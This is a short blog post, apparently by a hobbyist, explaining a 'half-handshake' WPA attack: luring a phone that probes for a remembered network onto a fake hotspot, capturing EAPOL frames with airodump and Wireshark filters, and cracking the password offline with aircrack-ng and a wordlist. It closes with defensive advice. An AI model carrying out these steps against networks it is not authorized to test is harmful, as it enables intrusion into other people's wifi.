Got around to playing with half-handshake cracking today, and I'm just a bit concerned right now. Cracking wifi with tricking devices to send half-handshake info, is pretty easy.
So, i guess the advice would be, when you're not using your wifi on your phone, turn it off when you're out and about. I do know this attack requires a bit of recon and some info, but not much, so it's fast, easy and stealthy to do.

So, for this to work, you'll need a couple of things. A client that remembers a network you have visited in the past, a Linux machine running Aircrack-NG and Wireshark, and maybe a smartphone that can run a wifi-hotspot.

So, start looking for clients probing for a known network, and when you have found them, lock airodump to that channel, and start wireshark also, running on the promiscous mode interface.

Start a fake Access point on the phone with the same name as the probe request is looking for, and look at the packages. Now, the trick to all of this is that the password you set on your fake access point don't have to match the real password, so set anything you like, this will still work.

Find the source address of the client, and apply as filter in Wireshark, that should give you a filter something like this

wlan.ta == 72:ae:3c:7c:7d:d5

We need to filter both sides of the communication, so copy and paste, until you get a filter like this

wlan.ta == 72:ae:3c:7c:7d:d5 || wlan.sa == 72:ae:3c:7c:7d:d5

Note that your MAC addresses will be different, this is an example.

Last check for eapol frames, with "eapol" as filter, or try this

eapol || wlan.ta == 72:ae:3c:7c:7d:d5 || wlan.sa == 72:ae:3c:7c:7d:d5

You need both eapol frames and probe requests for this to work, so make sure you see them before saving to pcap file.

If you got it, save it to a PCAP file, and quit wireshark. Now, find a good wordlist, and fire up aircrack-ng

aircrack-ng -w word.list pcapfile.pcap

If you have the password in the list, you should get a match. Do note that the client will only try and connect a couple of times before timing out, so start the capture BEFORE turning on the AP.

So, did we learn anything ? Yep, that any user that ever connected to your network became a threat all of the sudden. You can run all the best security in the world, but even if ONE phone have been connected in the past, and they have wifi turned on when they're out lunching, AND the attacker knows this from a bit of recon, it's safe to assume they have half your handshake :)

As always Much Happy Hacking :)

You have no rights to post comments